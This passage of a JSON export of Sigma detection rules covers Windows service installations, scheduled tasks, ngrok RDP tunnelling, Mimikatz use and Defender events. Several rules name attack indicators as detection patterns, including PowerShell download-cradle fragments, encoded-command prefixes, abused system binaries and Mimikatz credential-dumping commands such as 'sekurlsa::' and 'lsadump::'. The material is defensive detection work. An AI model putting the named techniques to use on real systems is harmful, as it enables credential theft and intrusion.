    "content": "title: New PDQDeploy Service - Client Side\nid: b98a10af-1e1e-44a7-bab2-4cc026917648\nstatus: test\ndescription: |\n    Detects PDQDeploy service installation on the target system.\n    When a package is deployed via PDQDeploy it installs a remote service on the target machine with the name \"PDQDeployRunner-X\" where \"X\" is an integer starting from 1\nreferences:\n    - https://documentation.pdq.com/PDQDeploy/13.0.3.0/index.html?windows-services.htm\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-07-22\ntags:\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.t1543.003\nlogsource:\n    product: windows\n    service: system\ndetection:\n    selection_root:\n        Provider_Name: 'Service Control Manager'\n        EventID: 7045\n    selection_service:\n        - ImagePath|contains: 'PDQDeployRunner-'\n        - ServiceName|startswith: 'PDQDeployRunner-'\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate use of the tool\nlevel: medium\n"
  },
  {
    "path": "rules/windows/builtin/system/service_control_manager/win_system_service_install_pua_proceshacker.yml",
    "content": "title: ProcessHacker Privilege Elevation\nid: c4ff1eac-84ad-44dd-a6fb-d56a92fc43a9\nstatus: test\ndescription: Detects a ProcessHacker tool that elevated privileges to a very high level\nreferences:\n    - https://twitter.com/1kwpeter/status/1397816101455765504\nauthor: Florian Roth (Nextron Systems)\ndate: 2021-05-27\nmodified: 2022-12-25\ntags:\n    - attack.persistence\n    - attack.execution\n    - attack.privilege-escalation\n    - attack.t1543.003\n    - attack.t1569.002\nlogsource:\n    product: windows\n    service: system\ndetection:\n    selection:\n        Provider_Name: 'Service Control Manager'\n        EventID: 7045\n        ServiceName|startswith: 'ProcessHacker'\n        AccountName: 'LocalSystem'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/system/service_control_manager/win_system_service_install_remcom.yml",
    "content": "title: RemCom Service Installation\nid: 9e36ed87-4986-482e-8e3b-5c23ffff11bf\nstatus: test\ndescription: Detects RemCom service installation and execution events\nreferences:\n    - https://github.com/kavika13/RemCom/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-08-07\ntags:\n    - attack.execution\n    - attack.t1569.002\nlogsource:\n    product: windows\n    service: system\ndetection:\n    selection_eid:\n        Provider_Name: 'Service Control Manager'\n        EventID: 7045\n    selection_service:\n        - ServiceName: 'RemComSvc'\n        - ImagePath|endswith: '\\RemComSvc.exe'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/builtin/system/service_control_manager/win_system_service_install_remote_access_software.yml",
    "content": "title: Remote Access Tool Services Have Been Installed - System\nid: 1a31b18a-f00c-4061-9900-f735b96c99fc\nrelated:\n    - id: c8b00925-926c-47e3-beea-298fd563728e\n      type: similar\nstatus: test\ndescription: Detects service installation of different remote access tools software. Such software is often abused by threat actors to perform\nreferences:\n    - https://redcanary.com/blog/misbehaving-rats/\nauthor: Connor Martin, Nasreddine Bencherchali\ndate: 2022-12-23\nmodified: 2023-06-22\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.execution\n    - attack.t1543.003\n    - attack.t1569.002\nlogsource:\n    product: windows\n    service: system\ndetection:\n    selection:\n        Provider_Name: 'Service Control Manager'\n        EventID:\n            - 7045\n            - 7036\n        ServiceName|contains:\n            # Based on https://github.com/SigmaHQ/sigma/pull/2841\n            - 'AmmyyAdmin' # https://www.ammyy.com/en/\n            - 'Atera'\n            - 'BASupportExpressSrvcUpdater' # https://www.systemlookup.com/O23/6837-BASupSrvcUpdater_exe.html\n            - 'BASupportExpressStandaloneService' # https://www.systemlookup.com/O23/6839-BASupSrvc_exe.html\n            - 'chromoting'\n            - 'GoToAssist' # https://www.goto.com/it-management/resolve\n            - 'GoToMyPC' # https://get.gotomypc.com/\n            - 'jumpcloud'\n            - 'LMIGuardianSvc' # https://www.logmein.com/\n            - 'LogMeIn' # https://www.logmein.com/\n            - 'monblanking'\n            - 'Parsec'\n            - 'RManService' # https://www.systemlookup.com/O23/7855-rutserv_exe.html\n            - 'RPCPerformanceService' # https://www.remotepc.com/\n            - 'RPCService' # https://www.remotepc.com/\n            - 'SplashtopRemoteService' # https://www.splashtop.com/\n            - 'SSUService'\n            - 'TeamViewer'\n            - 'TightVNC' # https://www.tightvnc.com/\n            - 'vncserver'\n            - 'Zoho'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/builtin/system/service_control_manager/win_system_service_install_remote_utilities.yml",
    "content": "title: Remote Utilities Host Service Install\nid: 85cce894-dd8b-4427-a958-5cc47a4dc9b9\nstatus: test\ndescription: Detects Remote Utilities Host service installation on the target system.\nreferences:\n    - https://www.remoteutilities.com/support/kb/host-service-won-t-start/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-10-31\ntags:\n    - attack.persistence\nlogsource:\n    product: windows\n    service: system\ndetection:\n    # Example:\n    #   <EventData>\n    #       <Data Name=\"ServiceName\">Remote Utilities - Host</Data>\n    #       <Data Name=\"ImagePath\">\"C:\\Program Files (x86)\\Remote Utilities - Host\\rutserv.exe\" -service</Data>\n    #       <Data Name=\"ServiceType\">user mode service</Data>\n    #       <Data Name=\"StartType\">auto start</Data>\n    #       <Data Name=\"AccountName\">LocalSystem</Data>\n    #   </EventData>\n    selection_root:\n        Provider_Name: 'Service Control Manager'\n        EventID: 7045\n    selection_service:\n        - ImagePath|contains|all:\n              - '\\rutserv.exe'\n              - '-service'\n        - ServiceName: 'Remote Utilities - Host'\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate use of the tool\nlevel: medium\n"
  },
  {
    "path": "rules/windows/builtin/system/service_control_manager/win_system_service_install_sliver.yml",
    "content": "title: Sliver C2 Default Service Installation\nid: 31c51af6-e7aa-4da7-84d4-8f32cc580af2\nstatus: test\ndescription: Detects known malicious service installations that appear in cases in which Sliver implants execute the PsExec command\nreferences:\n    - https://github.com/BishopFox/sliver/blob/79f2d48fcdfc2bee4713b78d431ea4b27f733f30/client/command/commands.go#L1231\n    - https://www.microsoft.com/security/blog/2022/08/24/looking-for-the-sliver-lining-hunting-for-emerging-command-and-control-frameworks/\nauthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-08-25\ntags:\n    - attack.persistence\n    - attack.execution\n    - attack.privilege-escalation\n    - attack.t1543.003\n    - attack.t1569.002\nlogsource:\n    product: windows\n    service: system\ndetection:\n    selection_eid:\n        Provider_Name: 'Service Control Manager'\n        EventID: 7045\n    selection_service_1:\n        ImagePath|re: '^[a-zA-Z]:\\\\windows\\\\temp\\\\[a-zA-Z0-9]{10}\\.exe'\n    selection_service_2:\n        ServiceName:\n            - 'Sliver'\n            - 'Sliver implant'\n    condition: selection_eid and 1 of selection_service_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/system/service_control_manager/win_system_service_install_sups_unusal_client.yml",
    "content": "title: Service Installed By Unusual Client - System\nid: 71c276aa-49cd-43d2-b920-2dcd3e6962d5\nrelated:\n    - id: c4e92a97-a9ff-4392-9d2d-7a4c642768ca\n      type: similar\nstatus: test\ndescription: Detects a service installed by a client which has PID 0 or whose parent has PID 0\nreferences:\n    - https://www.elastic.co/guide/en/security/current/windows-service-installed-via-an-unusual-client.html\nauthor: Tim Rauch (Nextron Systems), Elastic (idea)\ndate: 2022-09-15\nmodified: 2023-01-04\ntags:\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.t1543\nlogsource:\n    product: windows\n    service: system\ndetection:\n    selection:\n        Provider_Name: 'Service Control Manager'\n        EventID: 7045\n        ProcessId: 0\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/system/service_control_manager/win_system_service_install_susp.yml",
    "content": "title: Suspicious Service Installation\nid: 1d61f71d-59d2-479e-9562-4ff5f4ead16b\nrelated:\n    - id: ca83e9f3-657a-45d0-88d6-c1ac280caf53\n      type: obsolete\n    - id: 26481afe-db26-4228-b264-25a29fe6efc7\n      type: similar\nstatus: test\ndescription: Detects suspicious service installation commands\nreferences:\n    - Internal Research\nauthor: pH-T (Nextron Systems), Florian Roth (Nextron Systems)\ndate: 2022-03-18\nmodified: 2023-12-04\ntags:\n    - attack.persistence\n    - attack.privilege-escalation\n    - car.2013-09-005\n    - attack.t1543.003\nlogsource:\n    product: windows\n    service: system\ndetection:\n    selection:\n        Provider_Name: 'Service Control Manager'\n        EventID: 7045\n        ImagePath|contains:\n            - ' -nop '\n            - ' -sta '\n            - ' -w hidden '\n            - ':\\Temp\\'\n            - '.downloadfile(' # PowerShell download command\n            - '.downloadstring(' # PowerShell download command\n            - '\\ADMIN$\\'\n            - '\\Perflogs\\'\n            - '&&'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/system/service_control_manager/win_system_service_install_sysinternals_psexec.yml",
    "content": "title: PsExec Service Installation\nid: 42c575ea-e41e-41f1-b248-8093c3e82a28\nstatus: test\ndescription: Detects PsExec service installation and execution events\nreferences:\n    - https://www.jpcert.or.jp/english/pub/sr/ir_research.html\n    - https://jpcertcc.github.io/ToolAnalysisResultSheet\nauthor: Thomas Patzke\ndate: 2017-06-12\nmodified: 2023-08-04\ntags:\n    - attack.execution\n    - attack.t1569.002\n    - attack.s0029\nlogsource:\n    product: windows\n    service: system\ndetection:\n    selection_eid:\n        Provider_Name: 'Service Control Manager'\n        EventID: 7045\n    selection_service:\n        - ServiceName: 'PSEXESVC'\n        - ImagePath|endswith: '\\PSEXESVC.exe'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/builtin/system/service_control_manager/win_system_service_install_tacticalrmm.yml",
    "content": "title: TacticalRMM Service Installation\nid: 4bb79b62-ef12-4861-981d-2aab43fab642\nstatus: test\ndescription: Detects a TacticalRMM service installation. Tactical RMM is a remote monitoring & management tool.\nreferences:\n    - https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-11-28\ntags:\n    - attack.command-and-control\n    - attack.t1219.002\nlogsource:\n    product: windows\n    service: system\ndetection:\n    selection_root:\n        Provider_Name: 'Service Control Manager'\n        EventID: 7045\n    selection_service:\n        - ImagePath|contains: 'tacticalrmm.exe'\n        - ServiceName|contains: 'TacticalRMM Agent Service'\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate use of the tool\nlevel: medium\n"
  },
  {
    "path": "rules/windows/builtin/system/service_control_manager/win_system_service_install_tap_driver.yml",
    "content": "title: Tap Driver Installation\nid: 8e4cf0e5-aa5d-4dc3-beff-dc26917744a9\nstatus: test\ndescription: Well-known TAP software installation. Possible preparation for data exfiltration using tunnelling techniques\nreferences:\n    - https://community.openvpn.net/openvpn/wiki/ManagingWindowsTAPDrivers\nauthor: Daniil Yugoslavskiy, Ian Davis, oscd.community\ndate: 2019-10-24\nmodified: 2022-12-25\ntags:\n    - attack.exfiltration\n    - attack.t1048\nlogsource:\n    product: windows\n    service: system\ndetection:\n    selection:\n        Provider_Name: 'Service Control Manager'\n        EventID: 7045\n        ImagePath|contains: 'tap0901'\n    condition: selection\nfalsepositives:\n    - Legitimate OpenVPN TAP installation\nlevel: medium\n"
  },
  {
    "path": "rules/windows/builtin/system/service_control_manager/win_system_service_install_uncommon.yml",
    "content": "title: Uncommon Service Installation Image Path\nid: 26481afe-db26-4228-b264-25a29fe6efc7\nrelated:\n    - id: ca83e9f3-657a-45d0-88d6-c1ac280caf53\n      type: obsolete\n    - id: 1d61f71d-59d2-479e-9562-4ff5f4ead16b\n      type: derived\nstatus: test\ndescription: |\n    Detects uncommon service installation commands by looking at suspicious or uncommon image path values containing references to encoded powershell commands, temporary paths, etc.\nreferences:\n    - Internal Research\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-03-18\nmodified: 2024-02-09\ntags:\n    - attack.persistence\n    - attack.privilege-escalation\n    - car.2013-09-005\n    - attack.t1543.003\nlogsource:\n    product: windows\n    service: system\ndetection:\n    selection:\n        Provider_Name: 'Service Control Manager'\n        EventID: 7045\n    suspicious_paths:\n        ImagePath|contains:\n            - '\\\\\\\\.\\\\pipe'\n            - '\\Users\\Public\\'\n            - '\\Windows\\Temp\\'\n    suspicious_encoded_flag:\n        ImagePath|contains: ' -e'\n    suspicious_encoded_keywords:\n        ImagePath|contains:\n            - ' aQBlAHgA' # PowerShell encoded commands\n            - ' aWV4I' # PowerShell encoded commands\n            - ' IAB' # PowerShell encoded commands\n            - ' JAB' # PowerShell encoded commands\n            - ' PAA' # PowerShell encoded commands\n            - ' SQBFAFgA' # PowerShell encoded commands\n            - ' SUVYI' # PowerShell encoded commands\n    filter_optional_thor_remote:\n        ImagePath|startswith: 'C:\\WINDOWS\\TEMP\\thor10-remote\\thor64.exe'\n    filter_main_defender_def_updates:\n        ImagePath|startswith: 'C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\'\n    condition: selection and ( suspicious_paths or all of suspicious_encoded_* ) and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/builtin/system/service_control_manager/win_system_service_terminated_error_generic.yml",
    "content": "title: Windows Service Terminated With Error\nid: acfa2210-0d71-4eeb-b477-afab494d596c\nrelated:\n    - id: d6b5520d-3934-48b4-928c-2aa3f92d6963\n      type: similar\nstatus: test\ndescription: Detects Windows services that got terminated for whatever reason\nreferences:\n    - https://www.microsoft.com/en-us/security/blog/2023/04/11/guidance-for-investigating-attacks-using-cve-2022-21894-the-blacklotus-campaign/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-04-14\ntags:\n    - attack.defense-evasion\nlogsource:\n    product: windows\n    service: system\ndetection:\n    selection:\n        Provider_Name: 'Service Control Manager'\n        EventID: 7023 # The X Service service terminated with the following error\n    condition: selection\nfalsepositives:\n    - False positives could occur since service termination could happen due to multiple reasons\nlevel: low\n"
  },
  {
    "path": "rules/windows/builtin/system/service_control_manager/win_system_service_terminated_error_important.yml",
    "content": "title: Important Windows Service Terminated With Error\nid: d6b5520d-3934-48b4-928c-2aa3f92d6963\nrelated:\n    - id: acfa2210-0d71-4eeb-b477-afab494d596c\n      type: similar\nstatus: test\ndescription: Detects important or interesting Windows services that got terminated for whatever reason\nreferences:\n    - https://www.microsoft.com/en-us/security/blog/2023/04/11/guidance-for-investigating-attacks-using-cve-2022-21894-the-blacklotus-campaign/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-04-14\ntags:\n    - attack.defense-evasion\nlogsource:\n    product: windows\n    service: system\ndetection:\n    selection_eid:\n        Provider_Name: 'Service Control Manager'\n        EventID: 7023 # The X Service service terminated with the following error\n    selection_name:\n        - param1|contains:\n              # Note that these names are \"Display Names\" and are language specific. If you're using a non-English system these can and will be different\n              - ' Antivirus'\n              - ' Firewall'\n              - 'Application Guard'\n              - 'BitLocker Drive Encryption Service'\n              - 'Encrypting File System'\n              - 'Microsoft Defender'\n              - 'Threat Protection'\n              - 'Windows Event Log'\n        # Use this if you collect the binary value provided from this event, which is the wide hex encoded value of the service name.\n        - Binary|contains:\n              - '770069006e0064006500660065006e006400' # windefend (Microsoft Defender Antivirus Service)\n              - '4500760065006e0074004c006f006700' # EventLog\n              - '6d0070007300730076006300' # mpssvc (Windows Defender Firewall)\n              - '530065006e0073006500' # Sense (Windows Defender Advanced Threat Protection Service)\n              - '450046005300' # EFS (Encrypting File System)\n              - '420044004500530056004300' # BDESVC (BitLocker Drive Encryption Service)\n    condition: all of selection_*\nfalsepositives:\n    - Rare false positives could occur since service termination could happen due to multiple reasons\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/system/service_control_manager/win_system_service_terminated_unexpectedly.yml",
    "content": "title: Important Windows Service Terminated Unexpectedly\nid: 56abae0c-6212-4b97-adc0-0b559bb950c3\nstatus: test\ndescription: Detects important or interesting Windows services that got terminated unexpectedly.\nreferences:\n    - https://www.randori.com/blog/vulnerability-analysis-queuejumper-cve-2023-21554/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-04-14\ntags:\n    - attack.defense-evasion\nlogsource:\n    product: windows\n    service: system\ndetection:\n    selection_eid:\n        Provider_Name: 'Service Control Manager'\n        EventID: 7034 # The X service terminated unexpectedly. It has done this Y time(s).\n    selection_name:\n        # Note that these names contained in \"param1\" are \"Display Names\" and are language specific. If you're using a non-English system these can and will be different\n        - param1|contains: 'Message Queuing'\n        # Use this if you collect the binary value provided from this event, which is the wide hex encoded value of the service name.\n        - Binary|contains:\n              - '4d0053004d005100' # MSMQ (Microsoft Message Queuing). Encoded in upper case just in case\n              - '6d0073006d007100' # msmq\n    condition: all of selection_*\nfalsepositives:\n    - Rare false positives could occur since service termination could happen due to multiple reasons\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/system/service_control_manager/win_system_susp_rtcore64_service_install.yml",
    "content": "title: RTCore Suspicious Service Installation\nid: 91c49341-e2ef-40c0-ac45-49ec5c3fe26c\nstatus: test\ndescription: Detects the installation of the RTCore service, which could be an indication of abuse of the vulnerable Micro-Star MSI Afterburner driver\nreferences:\n    - https://github.com/br-sn/CheekyBlinder/blob/e1764a8a0e7cda8a3716aefa35799f560686e01c/CheekyBlinder/CheekyBlinder.cpp\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-08-30\ntags:\n    - attack.persistence\nlogsource:\n    product: windows\n    service: system\ndetection:\n    selection:\n        Provider_Name: 'Service Control Manager'\n        EventID: 7045\n        ServiceName: 'RTCore64'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/system/service_control_manager/win_system_susp_service_installation_folder.yml",
    "content": "title: Service Installation in Suspicious Folder\nid: 5e993621-67d4-488a-b9ae-b420d08b96cb\nstatus: test\ndescription: Detects service installation from a suspicious location such as the AppData folder or a loopback UNC path\nauthor: pH-T (Nextron Systems)\nreferences:\n    - Internal Research\ndate: 2022-03-18\nmodified: 2024-01-18\ntags:\n    - attack.persistence\n    - attack.privilege-escalation\n    - car.2013-09-005\n    - attack.t1543.003\nlogsource:\n    product: windows\n    service: system\ndetection:\n    selection:\n        Provider_Name: 'Service Control Manager'\n        EventID: 7045\n        ImagePath|contains:\n            - '\\AppData\\'\n            - '\\\\\\\\127.0.0.1'\n            - '\\\\\\\\localhost'\n    filter_optional_zoom:\n        ServiceName: 'Zoom Sharing Service'\n        ImagePath|contains: ':\\Program Files\\Common Files\\Zoom\\Support\\CptService.exe'\n    condition: selection and not 1 of filter_optional_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/builtin/system/service_control_manager/win_system_susp_service_installation_folder_pattern.yml",
    "content": "title: Service Installation with Suspicious Folder Pattern\nid: 1b2ae822-6fe1-43ba-aa7c-d1a3b3d1d5f2\nstatus: test\ndescription: Detects service installation with suspicious folder patterns\nreferences:\n    - Internal Research\nauthor: pH-T (Nextron Systems)\ndate: 2022-03-18\nmodified: 2022-03-24\ntags:\n    - attack.persistence\n    - attack.privilege-escalation\n    - car.2013-09-005\n    - attack.t1543.003\nlogsource:\n    product: windows\n    service: system\ndetection:\n    selection_eid:\n        Provider_Name: 'Service Control Manager'\n        EventID: 7045\n    selection_img_paths:\n        - ImagePath|re: '^[Cc]:\\\\[Pp]rogram[Dd]ata\\\\.{1,9}\\.exe'\n        - ImagePath|re: '^[Cc]:\\\\.{1,9}\\.exe'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/system/service_control_manager/win_system_susp_service_installation_script.yml",
    "content": "title: Suspicious Service Installation Script\nid: 70f00d10-60b2-4f34-b9a0-dc3df3fe762a\nstatus: test\ndescription: Detects suspicious service installation scripts\nreferences:\n    - Internal Research\nauthor: pH-T (Nextron Systems)\ndate: 2022-03-18\nmodified: 2024-03-05\ntags:\n    - attack.persistence\n    - attack.privilege-escalation\n    - car.2013-09-005\n    - attack.t1543.003\nlogsource:\n    product: windows\n    service: system\ndetection:\n    selection_eid:\n        Provider_Name: 'Service Control Manager'\n        EventID: 7045\n    selection_cmd_flags:\n        ImagePath|contains|windash:\n            - ' -c '\n            - ' -r '\n            - ' -k '\n    selection_binaries:\n        ImagePath|contains:\n            - 'cscript'\n            - 'mshta'\n            - 'powershell'\n            - 'pwsh'\n            - 'regsvr32'\n            - 'rundll32'\n            - 'wscript'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/taskscheduler/win_taskscheduler_execution_from_susp_locations.yml",
    "content": "title: Scheduled Task Executed From A Suspicious Location\nid: 424273ea-7cf8-43a6-b712-375f925e481f\nstatus: test\ndescription: Detects the execution of Scheduled Tasks where the Program being run is located in a suspicious location or it's an unusale program to be run from a Scheduled Task\nreferences:\n    - Internal Research\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-12-05\nmodified: 2023-02-07\ntags:\n    - attack.privilege-escalation\n    - attack.execution\n    - attack.persistence\n    - attack.t1053.005\nlogsource:\n    product: windows\n    service: taskscheduler\n    definition: 'Requirements: The \"Microsoft-Windows-TaskScheduler/Operational\" is disabled by default and needs to be enabled in order for this detection to trigger'\ndetection:\n    selection:\n        EventID: 129 # Created Task Process\n        Path|contains:\n            - 'C:\\Windows\\Temp\\'\n            - '\\AppData\\Local\\Temp\\'\n            - '\\Desktop\\'\n            - '\\Downloads\\'\n            - '\\Users\\Public\\'\n            - 'C:\\Temp\\'\n    # If you experience FP. Uncomment the filter below and add the specific TaskName with the Program to it\n    # filter:\n    #     TaskName: '\\Exact\\Task\\Name'\n    #     Path: 'Exact\\Path'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/builtin/taskscheduler/win_taskscheduler_lolbin_execution_via_task_scheduler.yml",
    "content": "title: Scheduled Task Executed Uncommon LOLBIN\nid: f0767f15-0fb3-44b9-851e-e8d9a6d0005d\nstatus: test\ndescription: Detects the execution of Scheduled Tasks where the program being run is located in a suspicious location or where it is an unusual program to be run from a Scheduled Task\nreferences:\n    - Internal Research\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-12-05\nmodified: 2023-02-07\ntags:\n    - attack.privilege-escalation\n    - attack.execution\n    - attack.persistence\n    - attack.t1053.005\nlogsource:\n    product: windows\n    service: taskscheduler\n    definition: 'Requirements: The \"Microsoft-Windows-TaskScheduler/Operational\" is disabled by default and needs to be enabled in order for this detection to trigger'\ndetection:\n    selection:\n        EventID: 129 # Created Task Process\n        Path|endswith:\n            - '\\calc.exe'\n            - '\\cscript.exe'\n            - '\\mshta.exe'\n            - '\\mspaint.exe'\n            - '\\notepad.exe'\n            - '\\regsvr32.exe'\n            # - '\\rundll32.exe'\n            - '\\wscript.exe'\n    # filter_system:\n    #     Path|endswith: '\\rundll32.exe'\n    #     TaskName|startswith: '\\Microsoft\\Windows\\'\n    # condition: selection and not 1 of filter_*\n    condition: selection\nfalsepositives:\n    - False positives may occur with some of the selected binaries if you have tasks using them (which could be very common in your environment). Exclude all the specific trusted tasks before using this rule\nlevel: medium\n"
  },
  {
    "path": "rules/windows/builtin/taskscheduler/win_taskscheduler_susp_schtasks_delete.yml",
    "content": "title: Important Scheduled Task Deleted\nid: 9e3cb244-bdb8-4632-8c90-6079c8f4f16d\nrelated:\n    - id: dbc1f800-0fe0-4bc0-9c66-292c2abe3f78 # ProcCreation schtasks delete\n      type: similar\n    - id: 7595ba94-cf3b-4471-aa03-4f6baa9e5fad # Security-Audting Eventlog\n      type: similar\nstatus: test\ndescription: |\n    Detects when adversaries try to stop system services or processes by deleting their respective scheduled tasks in order to conduct data destructive activities\nreferences:\n    - https://www.socinvestigation.com/most-common-windows-event-ids-to-hunt-mind-map/\nauthor: frack113\ndate: 2023-01-13\nmodified: 2023-02-07\ntags:\n    - attack.impact\n    - attack.t1489\nlogsource:\n    product: windows\n    service: taskscheduler\n    definition: 'Requirements: The \"Microsoft-Windows-TaskScheduler/Operational\" is disabled by default and needs to be enabled in order for this detection to trigger'\ndetection:\n    selection:\n        EventID: 141\n        TaskName|contains:\n            - '\\Windows\\SystemRestore\\SR'\n            - '\\Windows\\Windows Defender\\'\n            - '\\Windows\\BitLocker'\n            - '\\Windows\\WindowsBackup\\'\n            - '\\Windows\\WindowsUpdate\\'\n            - '\\Windows\\UpdateOrchestrator\\'\n            - '\\Windows\\ExploitGuard'\n    filter:\n        UserName|contains:\n            - 'AUTHORI'\n            - 'AUTORI'\n    condition: selection and not filter\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/terminalservices/win_terminalservices_rdp_ngrok.yml",
    "content": "title: Ngrok Usage with Remote Desktop Service\nid: 64d51a51-32a6-49f0-9f3d-17e34d640272\nstatus: test\ndescription: Detects cases in which ngrok, a reverse proxy tool, forwards events to the local RDP port, which could be a sign of malicious behaviour\nreferences:\n    - https://twitter.com/tekdefense/status/1519711183162556416?s=12&t=OTsHCBkQOTNs1k3USz65Zg\n    - https://ngrok.com/\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-04-29\ntags:\n    - attack.command-and-control\n    - attack.t1090\nlogsource:\n    product: windows\n    service: terminalservices-localsessionmanager\ndetection:\n    selection:\n        EventID: 21\n        Address|contains: '16777216'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/win_alert_mimikatz_keywords.yml",
    "content": "title: Mimikatz Use\nid: 06d71506-7beb-4f22-8888-e2e5e2ca7fd8\nstatus: test\ndescription: This method detects mimikatz keywords in different Eventlogs (some of them only appear in older Mimikatz version that are however still used by different threat groups)\nreferences:\n    - https://tools.thehacker.recipes/mimikatz/modules\nauthor: Florian Roth (Nextron Systems), David ANDRE (additional keywords)\ndate: 2017-01-10\nmodified: 2022-01-05\ntags:\n    - attack.s0002\n    - attack.lateral-movement\n    - attack.credential-access\n    - car.2013-07-001\n    - car.2019-04-004\n    - attack.t1003.002\n    - attack.t1003.004\n    - attack.t1003.001\n    - attack.t1003.006\nlogsource:\n    product: windows\ndetection:\n    keywords:\n        - 'dpapi::masterkey'\n        - 'eo.oe.kiwi'\n        - 'event::clear'\n        - 'event::drop'\n        - 'gentilkiwi.com'\n        - 'kerberos::golden'\n        - 'kerberos::ptc'\n        - 'kerberos::ptt'\n        - 'kerberos::tgt'\n        - 'Kiwi Legit Printer'\n        - 'lsadump::'\n        - 'mimidrv.sys'\n        - '\\mimilib.dll'\n        - 'misc::printnightmare'\n        - 'misc::shadowcopies'\n        - 'misc::skeleton'\n        - 'privilege::backup'\n        - 'privilege::debug'\n        - 'privilege::driver'\n        - 'sekurlsa::'\n    filter:\n        EventID: 15  # Sysmon's FileStream Events (could cause false positives when Sigma rules get copied on/to a system)\n    condition: keywords and not filter\nfalsepositives:\n    - Naughty administrators\n    - AV Signature updates\n    - Files with Mimikatz in their filename\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/windefend/win_defender_antimalware_platform_expired.yml",
    "content": "title: Windows Defender Grace Period Expired\nid: 360a1340-398a-46b6-8d06-99b905dc69d2\nrelated:\n    - id: fe34868f-6e0e-4882-81f6-c43aa8f15b62\n      type: obsolete\nstatus: stable\ndescription: |\n    Detects the expiration of the grace period of Windows Defender. This means protection against viruses, spyware, and other potentially unwanted software is disabled.\nreferences:\n    - https://learn.microsoft.com/en-us/defender-endpoint/troubleshoot-microsoft-defender-antivirus?view=o365-worldwide#event-id-5101\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md\n    - https://craigclouditpro.wordpress.com/2020/03/04/hunting-malicious-windows-defender-activity/\nauthor: Ján Trenčanský, frack113\ndate: 2020-07-28\nmodified: 2023-11-22\ntags:\n    - attack.defense-evasion\n    - attack.t1562.001\nlogsource:\n    product: windows\n    service: windefend\ndetection:\n    selection:\n        EventID: 5101 # The antimalware platform is expired.\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/windefend/win_defender_asr_lsass_access.yml",
    "content": "title: LSASS Access Detected via Attack Surface Reduction\nid: a0a278fe-2c0e-4de2-ac3c-c68b08a9ba98\nstatus: test\ndescription: Detects Access to LSASS Process\nreferences:\n    - https://learn.microsoft.com/en-us/defender-endpoint/attack-surface-reduction\nauthor: Markus Neis\ndate: 2018-08-26\nmodified: 2022-08-13\ntags:\n    - attack.credential-access\n    - attack.t1003.001\nlogsource:\n    product: windows\n    service: windefend\n    definition: 'Requirements:Enabled Block credential stealing from the Windows local security authority subsystem (lsass.exe) from Attack Surface Reduction (GUID: 9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2)'\ndetection:\n    selection:\n        EventID: 1121\n        Path|endswith: '\\lsass.exe'\n    filter_thor:\n        ProcessName|startswith: 'C:\\Windows\\Temp\\asgard2-agent\\'\n        ProcessName|endswith:\n            - '\\thor64.exe'\n            - '\\thor.exe'\n    filter_exact:\n        ProcessName:\n            - 'C:\\Windows\\System32\\atiesrxx.exe'\n            - 'C:\\Windows\\System32\\CompatTelRunner.exe'\n            - 'C:\\Windows\\System32\\msiexec.exe'\n            - 'C:\\Windows\\System32\\nvwmi64.exe'\n            - 'C:\\Windows\\System32\\svchost.exe'\n            - 'C:\\Windows\\System32\\Taskmgr.exe'\n            - 